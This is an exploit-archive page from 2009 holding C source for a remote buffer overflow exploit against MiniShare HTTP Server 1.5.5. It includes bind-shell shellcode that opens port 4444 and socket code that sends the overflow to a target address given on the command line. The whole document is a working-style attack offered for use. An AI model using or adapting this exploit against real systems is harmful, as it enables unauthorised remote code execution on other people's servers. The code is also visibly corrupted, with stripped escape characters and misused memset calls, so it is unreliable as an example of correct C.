[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MiniShare HTTP 1.5.5 BoF
# Published : 2009-10-19
# Author : iM4n
# Previous Title : 3Com OfficeConnect code execution
# Next Title : httpdx 1.4 h_handlepeer BoF
/*
MiniShare HTTP Server 1.5.5 Remote Buffer overflow Exploit by eMP3R0r TEAM
This bug Expl0ited and Discovered by iM4n
Sp Tnx2 : Shabgard & Aria Security FOrum
The Crimson Idol
*/
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <dos.h>
#pragma comment(lib, "ws2_32.lib")
#define buffer 557
#define PORT 80
#define NOP 0x90
/* Bind Shell open port 4444 */
char shellcode[]=
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
int main(int argc, char *argv[])
{
int mini1,mini2,tcp;
if (argc < 3)
{
printf("n MiniShare HTTP Server 1.5.4 Remote Buffer overflow Exploit by eMP3R0r TEAM n");
printf("n This bug Expl0ited and Discovered by iM4n n");
printf("n Usage : File.exe IPAdress Port n");
printf("n Ex : iM4n.exe 127.0.0.1 80 n");
exit(-1);
}
char overflow[buffer];
memset(overflow,NOP,buffer);
char win[] = "xEDx1Ex94x7C";
memset(overflow,win,sizeof(win)-1);
memset(overflow,shellcode,sizeof(shellcode)-1);
overflow[buffer] = 0;
WSADATA wsaData;
if(WSAStartup(MAKEWORD(2,1),&wsaData) != 0 )
{
printf("n windows socket is failed ! n");
exit(-1);
}
struct hostent *remote;
remote = gethostbyname (argv[1]);
if (! remote)
{
mini1=inet_addr(argv[1]);
}
if ((! remote) && (mini1 == INADDR_NONE))
{
printf("n unable ro resolve %s n",argv[1]);
exit(-1);
}
tcp = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (! tcp)
{
printf("n Socket Not created !n");
exit(-1);
}
struct sockaddr_in http;
if (remote != NULL)
memset(&(http.sin_addr),remote->h_addr,remote->length);
else
http.sin_addr.s_addr = mini1;
if(remote)
http.sin_family = remote->h_addrtype;
else
http.sin_family = AF_INET;
http.sin_port = htons(PORT);
printf("n Attacking on HTTP Server ...! %sn",argv[1]);
sleep(400);
printf("n Sending String on Target ...n",sizeof(overflow));
sleep(300);
mini2 = connect (tcp ,(struct sockaddr *) &http,sizeof(struct sockaddr_in));
if(mini2 == 0)
{
printf("n Sending Socket ...!n");
sleep(500);
printf("n connecting ...!n");
send(tcp,overflow,sizeof(overflow),0);
printf("n Exploit Done !n");
// attack on port 4444
printf("n exploit runed ! please telnet ip address and Port 4444 ! n");
}
else
{
printf("n Exploit not done and ip address machin not listening in Port 4444! n");
}
shutdown(tcp,1);
closesocket(tcp);
return 0;
}